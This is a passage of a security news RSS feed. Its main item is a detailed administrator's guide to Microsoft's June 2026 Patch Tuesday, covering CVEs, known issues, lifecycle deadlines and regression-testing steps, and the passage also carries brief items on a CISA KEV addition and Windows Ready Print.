href="https://www.reddit.com/r/linux/comments/1u5vdxu/2011_macbook_pro_looks_like_it_just_came_out_of/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. CISA adds Ivanti Sentry flaw to its Known Exploited Vulnerabilities catalog and urges patching by June 14]]></title>
<description><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Sentry flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Ivanti Sentry flaw, tracked as CVE-2026-10520 (CVSS score of 10.0), to its Known Exploited Vu...]]></description>
<link>https://tsecurity.de/de/3594414/hacking/us-cisa-adds-ivanti-sentryflaw-to-its-known-exploited-vulnerabilities-catalog-and-urges-patching-by-june-14/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594414/hacking/us-cisa-adds-ivanti-sentryflaw-to-its-known-exploited-vulnerabilities-catalog-and-urges-patching-by-june-14/</guid>
<pubDate>Fri, 12 Jun 2026 21:33:45 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Sentry flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Ivanti Sentry flaw, tracked as CVE-2026-10520 (CVSS score of 10.0), to its Known Exploited Vulnerabilities (KEV) catalog. Ivanti Sentry is a secure gateway appliance that sits between an organization’s internal […]]]></content:encoded>
</item>
<item>
<title><![CDATA[For June, Patch Tuesday means an IT scramble]]></title>
<description><![CDATA[Microsoft this week released 206 updates affecting Windows, Office, Exchange Server, and its developer tools —  including three Windows vulnerabilities already publicly disclosed. That trio includes an elevation of privilege in the Collaborative Translation Framework (CVE-2026-45586), a denial of...]]></description>
<link>https://tsecurity.de/de/3594011/it-nachrichten/for-june-patch-tuesday-means-an-it-scramble/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594011/it-nachrichten/for-june-patch-tuesday-means-an-it-scramble/</guid>
<pubDate>Fri, 12 Jun 2026 18:24:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft this week <a href="https://learn.microsoft.com/en-us/security-updates/" target="_blank" rel="noreferrer noopener">released 206 updates</a> affecting Windows, Office, Exchange Server, and its developer tools —  including three Windows vulnerabilities already publicly disclosed. That trio includes an elevation of privilege in the Collaborative Translation Framework (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45586" target="_blank" rel="noreferrer noopener">CVE-2026-45586</a>), a denial of service in HTTP.sys (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49160" target="_blank" rel="noreferrer noopener">CVE-2026-49160</a>), and a BitLocker security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507" target="_blank" rel="noreferrer noopener">CVE-2026-50507</a>). At the moment, none appear to be under active exploitation, but all three are rated “Exploitation More Likely.” </p>



<p>Even without an exploited zero-day, the <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jun" target="_blank" rel="noreferrer noopener">June 2026 Patch Tuesday</a> release requires Patch Now recommendations for Windows, Office, and Exchange. The latter is back in the patch picture with a consolidated security update that Microsoft recommends installing “as soon as possible.” </p>



<p>The Readiness team suggests testing start with domain controllers, Hyper-V hosts, anything self-hosting on HTTP.sys, and Outlook-heavy desktops —  in that order. To help navigate these changes, here’s a <a href="https://applicationreadiness.com/perspectives/assurance-security-dashboard-june-2026-patch-tuesday/" target="_blank" rel="noreferrer noopener">useful infographic</a> detailing the risks of deploying the updates to each platform.</p>



<p>(More information about <a href="https://www.computerworld.com/article/3481576/microsofts-patch-tuesday-updates-keeping-up-with-the-latest-fixes.html">recent Patch Tuesday releases is available here</a>.)</p>



<h2 class="wp-block-heading">Known issues</h2>



<p>This <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jun" target="_blank" rel="noreferrer noopener">June release note</a> from Microsoft flags known issues with three updates:</p>



<ul class="wp-block-list">
<li><a href="https://support.microsoft.com/help/5094128" target="_blank" rel="noreferrer noopener">KB5094128</a> — BitLocker recovery prompt on first restart (Windows Server 2022). The PCR7 condition we have tracked since April is still live on the platforms that did not receive May’s Boot Manager servicing fix. Devices with BitLocker enabled on the OS drive, the Group Policy “Configure TPM platform validation profile for native UEFI firmware configurations” set with PCR7 included, and System Information reporting Secure Boot State PCR7 Binding as “Not Possible” may prompt for the recovery key on the first restart after installing this update.</li>



<li><a href="https://support.microsoft.com/help/5094127" target="_blank" rel="noreferrer noopener">KB5094127</a> — Windows 10 21H2/22H2. The release note carries a known-issue flag, too, with Windows 10 in the same boat as Server 2022: it has not received the Boot Manager servicing improvement that closed the BitLocker/PCR7 recovery condition on Windows 11. So, that same Group Policy configuration remains the trigger to check before deployment.</li>



<li><a href="https://support.microsoft.com/help/5094125" target="_blank" rel="noreferrer noopener">KB5094125</a>/<a href="https://support.microsoft.com/help/5094128" target="_blank" rel="noreferrer noopener">KB5094128</a> — WSUS synchronization error details suppressed (Windows Server 2025 and 2022). WSUS no longer displays synchronization error details in its reporting. This is deliberate: the functionality was “temporarily removed to address the Remote Code Execution Vulnerability, CVE-2025-59287.” Microsoft offered no workaround.</li>
</ul>



<p>One continuing advisory from May remains in effect: Windows Update can still replace manually installed graphics drivers with older OEM versions from the Windows Update catalogue.</p>



<h2 class="wp-block-heading">Major revisions and mitigations</h2>



<p>Unlike last month, this patch cycle delivered two genuine revisions and a cluster of out-of-band fixes that require action:</p>



<ul class="wp-block-list">
<li>Microsoft Teams Spoofing (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32185" target="_blank" rel="noreferrer noopener">CVE-2026-32185</a>) — revised to version 3.0 on May 21. Microsoft announced the availability of the security update for Teams for Android; customers running affected versions should install it. If your mobile fleet runs Android, this is the action item.</li>



<li>Microsoft Defender out-of-band cluster (May 19–21) — a Critical remote code execution flaw (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45584" target="_blank" rel="noreferrer noopener">CVE-2026-45584</a>), plus an elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091">CVE-2026-41091</a>) <em>and</em> a denial of service (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45498" target="_blank" rel="noreferrer noopener">CVE-2026-45498</a>).</li>



<li>SharePoint RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45659" target="_blank" rel="noreferrer noopener">CVE-2026-45659</a>) — a separate out-of-band fix also posted on May 21. SharePoint admins had three distinct security notices in a fortnight. The recommendation: deploy these clustered but separate patches as a single unit.</li>
</ul>



<p>Interestingly, there were two omissions from last month’s list:</p>



<ul class="wp-block-list">
<li>SharePoint Server RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47294" target="_blank" rel="noreferrer noopener">CVE-2026-47294</a>) — published May 29 with the note that it “was addressed by updates that were released in May 2026, but the CVE was inadvertently omitted from the May 2026 Security Updates.”</li>



<li>Windows DWM Core Library Information Disclosure (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48566" target="_blank" rel="noreferrer noopener">CVE-2026-48566</a>) — also fixed in May, also left off the May list.</li>
</ul>



<p>That makes two months running: the Patch Tuesday list is never final. The June release itself also carried a substantive revision:</p>



<ul class="wp-block-list">
<li>Remote Desktop cluster re-issued for Windows 11 26H1 — five RDP/RDS CVEs from 2024–2025, including two Critical RCEs (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49123" target="_blank" rel="noreferrer noopener">CVE-2024-49123</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49132" target="_blank" rel="noreferrer noopener">CVE-2024-49132</a>) and the RDP Server RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43582" target="_blank" rel="noreferrer noopener">CVE-2024-43582</a>). If you are running 26H1, the June cumulative closes these older CVEs.</li>
</ul>



<h2 class="wp-block-heading">Windows lifecycle and enforcement updates</h2>



<p>Given the month SharePoint just had, SharePoint 2016/2019 require some of the cycle’s most active patching on a platform with one update left. If migration is not already in progress, July’s final update is the deadline. Here are the other key dates:</p>



<ul class="wp-block-list">
<li>The 2011 KEK CA expires on June 24, and the UEFI CA for third-party boot loaders follows three days later, with the Windows Production PCA for the boot manager coming up October. 19. Devices that have not taken the Windows UEFI CA 2023 key updates under <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24932" target="_blank" rel="noreferrer noopener">CVE-2023-24932</a> lose the ability to receive updated boot components once the certificates lapse. This is a big deal.</li>



<li>With just one Patch Tuesday to go, SharePoint Server 2016 and 2019, Project Server 2016 and 2019, SQL Server 2016, and SQL Server 2014 ESU Year 2 all reach end of support on July 14. (InfoPath 2013, SharePoint Designer 2013, and Visual Studio 2022 17.12 LTSC go with them.)</li>



<li>Kerberos RC4 hardening (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20833" target="_blank" rel="noreferrer noopener">CVE-2026-20833</a>) moves from default-hardening to its enforcement phase next month. Accounts still depending on RC4 service tickets have weeks, not months.</li>



<li>The graphics-driver targeting change (four-part to two-part Hardware IDs) pilots to September 2026, with broader enforcement planned for Q4 2026 to Q1 2027; until then, Windows Update can still downgrade manually installed display drivers.</li>
</ul>



<p>This month’s release is a security-only release with a clear feature focus: the Remote Desktop client. The Remote Desktop ActiveX control (mstscax.dll) is the most patched component this cycle with five separate updates (see below). </p>



<p>The secondary theme is <a href="https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/windows-authentication-overview" target="_blank" rel="noreferrer noopener">Windows authentication</a>, with three updates to the NTLM security package. Every Windows binary this month reports no functional changes, so the work is pure regression validation. Lower-risk patches reach DHCP, telephony, Hyper-V, UDF and Projected File System storage, and the graphics stack.</p>



<h2 class="wp-block-heading">Remote Desktop client</h2>



<p>The Remote Desktop client (mstscax.dll) draws a high-risk flag that lands specifically on <a href="https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/remote-desktop-printing" target="_blank" rel="noreferrer noopener">printer redirection</a> — the path that maps a client’s local printers into a remote session. A regression here typically shows as missing redirected printers, failed print jobs, or a hang on connect or reconnect. The wider Remote Desktop stack is also updated, including <a href="https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/rds-remote-desktop-services" target="_blank" rel="noreferrer noopener">RemoteApp</a> and clipboard redirection (rdpclip.exe, RdpCoreTS.dll) and <a href="https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/rds-client-access-license" target="_blank" rel="noreferrer noopener">Remote Desktop Licensing</a> (lserver.dll). So, be sure to validate connection, session, and licensing together.</p>



<p>A passing run is a remote session that connects, redirects printers, prints, and survives a reconnect with no crashes or missing devices.</p>



<ul class="wp-block-list">
<li>Connect with <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc" target="_blank" rel="noreferrer noopener">Remote Desktop Connection</a> (mstsc.exe) to a test host, enable printer redirection in Local Resources, and confirm redirected printers appear in the session.</li>



<li>Print a test page from an app in the session to a redirected printer; repeat with two or more client printers installed.</li>



<li>Disconnect and reconnect the session, then confirm the redirected printers are still present and usable.</li>



<li>Repeat the printer test in both a full desktop session and a RemoteApp session.</li>



<li>Exercise general remote access: connect through a <a href="https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/rds-deploy-infrastructure" target="_blank" rel="noreferrer noopener">Remote Desktop Gateway</a>, use <a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/learn-more/use-local-resources-on-hyper-v-virtual-machine-with-vmconnect" target="_blank" rel="noreferrer noopener">VMConnect</a> to reach a VM, and verify clipboard and device redirection.</li>



<li>On a Remote Desktop Licensing server, confirm clients connect with licensing enabled, across Per User and Per Device modes.</li>
</ul>



<h2 class="wp-block-heading">Windows authentication (NTLM)</h2>



<p>Three updates touch the NTLM security support provider (msv1\_0.dll), the module behind network authentication when Kerberos is not used. Authentication changes are regression-sensitive: the failure modes are logon failures, broken file-share or RDP access, and application sign-in problems. Validate across domain-joined and workgroup machines.</p>



<ul class="wp-block-list">
<li>Sign in to domain-joined and standalone machines with domain, local, and cached credentials after a reboot.</li>



<li>Access <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview" target="_blank" rel="noreferrer noopener">SMB file shares</a> by host name and IP, including paths that fall back to NTLM, and confirm authenticated reads and writes.</li>



<li>Authenticate to a Remote Desktop host and to line-of-business applications that rely on integrated Windows authentication.</li>



<li>Watch the <a href="https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" target="_blank" rel="noreferrer noopener">Security event log</a> for new logon-failure or audit anomalies during the test window.</li>
</ul>



<h2 class="wp-block-heading">Other Windows components</h2>



<p>The remaining updates carry no functional changes, so cover them with routine regression by area.</p>



<ul class="wp-block-list">
<li>Networking: exercise DHCP lease, renewal, and release on IPv4 and IPv6 (dhcpcore), sustained socket traffic over the WinSock driver (afd.sys, two updates), HTTP.sys request handling under IIS, and TAPI telephony integrations (tapisrv.dll).</li>



<li>Virtualization: boot Generation 1 and Generation 2 VMs, including nested virtualization, to cover the Hyper-V hypervisor (hvix64/hvax64), and connect a VM through an external virtual switch (toggling NIC RSS) to cover vmswitch.sys.</li>



<li>Storage and filesystems: read and write UDF-formatted media (udfs.sys), exercise the <a href="https://learn.microsoft.com/en-us/windows/win32/projfs/projected-file-system" target="_blank" rel="noreferrer noopener">Projected File System</a> minifilter (prjflt.sys), and validate cloud files hydration and <a href="https://learn.microsoft.com/en-us/windows-server/storage/work-folders/work-folders-overview" target="_blank" rel="noreferrer noopener">Work Folders</a> sync (cldflt.sys, workfolders.exe), including a <a href="https://learn.microsoft.com/en-us/windows-server/storage/refs/refs-overview" target="_blank" rel="noreferrer noopener">ReFS</a> volume with BitLocker enabled.</li>



<li>Graphics and shell: run GPU-accelerated and 2D rendering workloads to cover <a href="https://learn.microsoft.com/en-us/windows/win32/direct2d/direct2d-portal" target="_blank" rel="noreferrer noopener">Direct2D</a> (d2d1.dll), <a href="https://learn.microsoft.com/en-us/windows/win32/gdiplus/-gdiplus-gdi-start">GDI+</a> (gdiplus.dll), the Desktop Window Manager (dwmcore.dll), the <a href="https://learn.microsoft.com/en-us/windows/win32/wic/-wic-about-windows-imaging-codec" target="_blank" rel="noreferrer noopener">Windows Imaging Component</a> (windowscodecs.dll), and <a href="https://learn.microsoft.com/en-us/windows/win32/winauto/entry-uiauto-win32" target="_blank" rel="noreferrer noopener">UI Automation</a> (UiaManager.dll); watch for artifacts and accessibility regressions.</li>



<li>Notifications and input: open apps that raise toast and push notifications (wpnapps.dll, wpncore.dll) and verify <a href="https://learn.microsoft.com/en-us/windows/win32/tsf/text-services-framework" target="_blank" rel="noreferrer noopener">Text Services Framework</a> input across keyboard layouts and IMEs (msctf.dll).</li>
</ul>



<h2 class="wp-block-heading">Microsoft Office &amp; SharePoint</h2>



<p>June’s Office updates are MSI editions only: Excel 2016 (KB5002877), Word 2016 (KB5002879), Office 2016 shared components (KB5002878, KB5002852, and the rich-edit control KB5002578), and Office Online Server 2019 (KB5002875). The shared Office 2016 component updates also apply to the SharePoint Server 2016, 2019, and Subscription Edition baselines. No Critical non-security client release ships this cycle, and Click-to-Run estates are unaffected.</p>



<ul class="wp-block-list">
<li>Open complex Excel workbooks with formulas, macros, and external data connections; save and reopen to verify integrity.</li>



<li>Edit Word documents with embedded objects, tracked changes, and rich formatting that exercises the rich-edit control.</li>



<li>On the SharePoint Server baselines (2016, 2019, Subscription Edition) and Office Online Server, validate document library operations, co-authoring, and browser-based viewing and editing.</li>



<li>Confirm that Office add-ins and line-of-business integrations continue to operate.</li>
</ul>



<h2 class="wp-block-heading">Developer tools and databases</h2>



<p>June’s fixes update the .NET SDK across the 8.0, 9.0, and 10.0 servicing lines (8.0.422, 9.0.315, 10.0.301), and ships SQL Server GDR security updates spanning SQL Server 2016 SP3 through SQL Server 2025, in both RTM+GDR and cumulative-update+GDR branches.</p>



<ul class="wp-block-list">
<li>After installing the .NET SDK update, build and run representative applications and confirm existing projects compile and execute normally.</li>



<li>For SQL Server, install the GDR update onto the matching baseline or cumulative-update branch, then restart the service and run standard transactions.</li>



<li>Verify a backup and restore, confirm Always On availability groups stay healthy, and test patch install and removal on each servicing branch.</li>
</ul>



<p>The Readiness team suggests that this month’s testing lead with Remote Desktop. The client is both the most-patched component and the sole High Risk item, so give it a focused regression pass centered on <a href="https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/remote-desktop-printing">printer redirec</a>t<a href="https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/remote-desktop-printing">ion</a>, then broaden to general connectivity, RemoteApp, clipboard and device redirection, gateway access, and licensing. </p>



<p>The NTLM authentication updates are the second priority: validate domain and standalone logon, file-share access, and application sign-in. Everything else is a no-functional-change security update, so cover networking, Hyper-V, storage, and graphics with routine regression. Office is MSI-only, with Click-to-Run untouched, and the .NET and SQL Server updates round out the developer and database estate.</p>



<p>Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings:</p>



<h2 class="wp-block-heading">Browsers</h2>



<p>Microsoft Edge released the stable version (149.0.4022.52) on June 4, per the <a href="https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security" target="_blank" rel="noreferrer noopener">Edge security release notes</a>. Nothing ships for Internet Explorer, which remains retired. This cycle is unusually lopsided: just one Edge-engineered CVE against a very large Chromium upstream flow:</p>



<ul class="wp-block-list">
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47644" target="_blank" rel="noreferrer noopener">CVE-2026-47644</a> — Copilot Chat (Microsoft Edge) — Information disclosure (CVSS 6.5, rated critical). For the second month running, Copilot Chat in Edge supplies the headline browser issue (May’s was <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33111" target="_blank" rel="noreferrer noopener">CVE-2026-33111</a>); Microsoft addresses the Copilot service component, with the browser update completing the fix.</li>



<li>Chromium upstream — 407 CVEs relayed through MSRC this cycle, spanning the weekly Chrome release cadence since the May report: use-after-free, out-of-bounds read/write, type confusion, and policy bypass across V8, Blink, PDFium, WebRTC, ANGLE, and DevTools. The same fixes ship in the Chrome Stable channel; see the <a href="https://chromereleases.googleblog.com/" target="_blank" rel="noreferrer noopener">Chrome release blog</a> for the upstream notes.</li>
</ul>



<p>The Chromium volume looks alarming but is routine plumbing —  it flows to Edge through its own auto-update channel. Add these updates to your standard release schedule for Edge-managed environments.</p>



<h2 class="wp-block-heading">Windows</h2>



<p>Microsoft addressed 119 vulnerabilities in Windows this month, 22 rated critical and 97, important —  nearly double May’s count. Elevation of privilege again dominates by volume (49 entries), followed by remote code execution (28), information disclosure (16), security feature bypass (15), denial of service (6), and a handful of spoofing and tampering entries. All three of June’s publicly disclosed zero-days land here:</p>



<ul class="wp-block-list">
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45586" target="_blank" rel="noreferrer noopener">CVE-2026-45586</a> — Collaborative Translation Framework (CTFMON) — Elevation of privilege (CVSS 7.8, publicly disclosed).</li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49160" target="_blank" rel="noreferrer noopener">CVE-2026-49160</a> — HTTP.sys — Denial of service (CVSS 7.5, publicly disclosed).</li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507" target="_blank" rel="noreferrer noopener">CVE-2026-50507</a> — BitLocker — Security feature bypass (CVSS 6.8, publicly disclosed) —  BitLocker’s third entry this month, keeping it on the radar alongside the PCR7 known issue.</li>
</ul>



<p>At the feature level, the critical risks are concentrated in nine areas:</p>



<ul class="wp-block-list">
<li>Remote Desktop Client — the largest single cluster: 11 CVEs, 7 rated critical, led by <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47289" target="_blank" rel="noreferrer noopener">CVE-2026-47289</a> and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42985" target="_blank" rel="noreferrer noopener">CVE-2026-42985</a> (both CVSS 8.8, the latter “Exploitation More Likely”).</li>



<li>Windows Kernel — <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45657" target="_blank" rel="noreferrer noopener">CVE-2026-45657</a>, remote code execution at CVSS 9.8, the joint-highest Windows score this cycle.</li>



<li>HTTP.sys — <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291">CVE-2026-47291</a>, unauthenticated remote code execution (CVSS 9.8, “Exploitation More Likely”) in the kernel-mode web server underpinning IIS, WinRM, and anything self-hosting on http.sys — paired with the disclosed DoS above.</li>



<li>DHCP Client — <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815" target="_blank" rel="noreferrer noopener">CVE-2026-44815</a>, remote code execution at CVSS 9.8.</li>



<li>Active Directory Domain Services — <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45648" target="_blank" rel="noreferrer noopener">CVE-2026-45648</a>, remote code execution (CVSS 8.8) on the directory itself, with the Kerberos KDC adding a separate critical RCE (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47288" target="_blank" rel="noreferrer noopener">CVE-2026-47288</a>).</li>



<li>Hyper-V — three critical RCEs (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45607" target="_blank" rel="noreferrer noopener">CVE-2026-45607</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45641" target="_blank" rel="noreferrer noopener">CVE-2026-45641</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47652" target="_blank" rel="noreferrer noopener">CVE-2026-47652</a>, up to CVSS 8.4) — guest-to-host risk on virtualization hosts.</li>



<li>Windows Graphics Component — two critical RCEs (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44803" target="_blank" rel="noreferrer noopener">CVE-2026-44803</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44812" target="_blank" rel="noreferrer noopener">CVE-2026-44812</a>, CVSS 7.8), both “Exploitation More Likely” vulnerabilities reachable through Office rendering paths.</li>



<li>Windows Deployment Services — <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42987" target="_blank" rel="noreferrer noopener">CVE-2026-42987</a>, remote code execution (CVSS 8.1).</li>



<li>Cryptographic Services and Device Health Attestation — critical elevation-of-privilege entries (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44810" target="_blank" rel="noreferrer noopener">CVE-2026-44810</a>, CVSS 8.4; <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33828" target="_blank" rel="noreferrer noopener">CVE-2026-33828</a>, CVSS 7.8) in trust-anchor components.</li>
</ul>



<p>Given the publicly disclosed vulnerabilities this month, add this Windows update to your Patch Now schedule.</p>



<h2 class="wp-block-heading">Office</h2>



<p>Microsoft released 53 Office CVEs this month — 10 critical, 43 important. Remote code execution again leads (24 entries), but the surprise is spoofing at 20 entries, almost all of it SharePoint. (SharePoint Server appears in 30 of the 53 CVEs this cycle.) The rest split across information disclosure (6), elevation of privilege (2), and a security feature bypass.</p>



<ul class="wp-block-list">
<li>Microsoft has addressed seven critical remote code execution entries, each CVSS 8.4, each with the Preview Pane confirmed as an attack vector: <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45456" target="_blank" rel="noreferrer noopener">CVE-2026-45456</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45458" target="_blank" rel="noreferrer noopener">CVE-2026-45458</a>, and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47635" target="_blank" rel="noreferrer noopener">CVE-2026-47635</a> against Outlook and Word, plus <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45461" target="_blank" rel="noreferrer noopener">CVE-2026-45461</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45463" target="_blank" rel="noreferrer noopener">CVE-2026-45463</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45472" target="_blank" rel="noreferrer noopener">CVE-2026-45472</a>, and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45474" target="_blank" rel="noreferrer noopener">CVE-2026-45474</a> against Office broadly.</li>
</ul>



<p>Add these Office updates to your Patch Now deployment, prioritizing Outlook-heavy desktops and SharePoint farms.</p>



<h2 class="wp-block-heading">Microsoft Exchange and SQL Server</h2>



<p>The pattern inverts from May: SQL Server receives nothing (no patches at all), while Exchange Server — absent in May — returns with a consolidated security update carrying seven CVEs for on-premises builds (Exchange Server 2016 CU23 and Exchange Server 2019), plus one cloud-side critical:</p>



<ul class="wp-block-list">
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45504" target="_blank" rel="noreferrer noopener">CVE-2026-45504</a> — Exchange Server — Elevation of privilege (CVSS 8.8). The headline on-premises entry.</li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45503" target="_blank" rel="noreferrer noopener">CVE-2026-45503</a> and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47631" target="_blank" rel="noreferrer noopener">CVE-2026-47631</a> — Exchange Server — Information disclosure and spoofing, each CVSS 8.1.</li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45583" target="_blank" rel="noreferrer noopener">CVE-2026-45583</a> — Exchange Server — Remote code execution (CVSS 7.5), with three further spoofing/information-disclosure entries (CVE-2026-45500, CVE-2026-45501, CVE-2026-45502) rounding out the set.</li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48579" target="_blank" rel="noreferrer noopener">CVE-2026-48579</a> — Exchange Online — Information disclosure (CVSS 9.1, rated critical) —  addressed service-side, no customer action.</li>
</ul>



<p>Microsoft also revised the May Exchange spoofing entry (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42897" target="_blank" rel="noreferrer noopener">CVE-2026-42897</a>) to point at this same June security update, with the recommendation to install “as soon as possible.” Add the June Exchange SU to your Patch Now schedule.</p>



<h2 class="wp-block-heading">Developer tools</h2>



<p>Microsoft released 10 CVEs across its developer tooling this month, all rated important —  though the top score outranks most of this cycle’s criticals, and the concentration in Visual Studio Code (seven of 10 entries) continues last month’s pattern:</p>



<ul class="wp-block-list">
<li>Visual Studio Code — seven entries led by <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47281" target="_blank" rel="noreferrer noopener">CVE-2026-47281</a>, an elevation of privilege at CVSS 9.6 —  the highest developer-tools score in months. Behind it: <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45482" target="_blank" rel="noreferrer noopener">CVE-2026-45482</a>, a security feature bypass in the GitHub Copilot Chat extension (CVSS 8.4); <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47292" target="_blank" rel="noreferrer noopener">CVE-2026-47292</a>, remote code execution in the MSSQL extension (CVSS 7.8); a second elevation of privilege (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40376" target="_blank" rel="noreferrer noopener">CVE-2026-40376</a>, CVSS 7.5); and security-feature-bypass, tampering, and information-disclosure entries (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48569" target="_blank" rel="noreferrer noopener">CVE-2026-48569</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47287" target="_blank" rel="noreferrer noopener">CVE-2026-47287</a>, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47284" target="_blank" rel="noreferrer noopener">CVE-2026-47284</a>).</li>



<li>Microsoft .NET on Windows has three entries: <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45490" target="_blank" rel="noreferrer noopener">CVE-2026-45490</a>, a .NET SDK elevation of privilege (CVSS 7.8) across .NET 8.0, 9.0, and 10.0; <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45591" target="_blank" rel="noreferrer noopener">CVE-2026-45591</a>, an ASP.NET Core denial of service (CVSS 7.5); and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45491" target="_blank" rel="noreferrer noopener">CVE-2026-45491</a>, a .NET tampering issue (CVSS 6.2).</li>
</ul>



<p>Add these Microsoft updates to your standard developer update release plan.</p>



<h2 class="wp-block-heading">Adobe (and third-party updates)</h2>



<p>Adobe released <a href="https://helpx.adobe.com/security/products/acrobat/apsb26-63.html" target="_blank" rel="noreferrer noopener">APSB26-63</a> for Acrobat and Reader this cycle, fixing critical code-execution flaws; Adobe reports no exploitation in the wild. Add it to your standard third-party schedule. This is a big (fat) Windows update this month (and yes, I think that AI has something to do with the number of these patches). </p>



<p>Good luck with your deployments.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is Windows Ready Print? How to Enable or Disable it?]]></title>
<description><![CDATA[If you have ever struggled with printer drivers crashing or failing to install, you are going to like what Microsoft is doing with Windows 11. Microsoft has decided to move away from legacy third-party printer drivers and introduce a more modern printing system called Windows Ready Print. In this...]]></description>
<link>https://tsecurity.de/de/3593975/windows-tipps/what-is-windows-ready-print-how-to-enable-or-disable-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593975/windows-tipps/what-is-windows-ready-print-how-to-enable-or-disable-it/</guid>
<pubDate>Fri, 12 Jun 2026 18:08:10 +0200</pubDate>
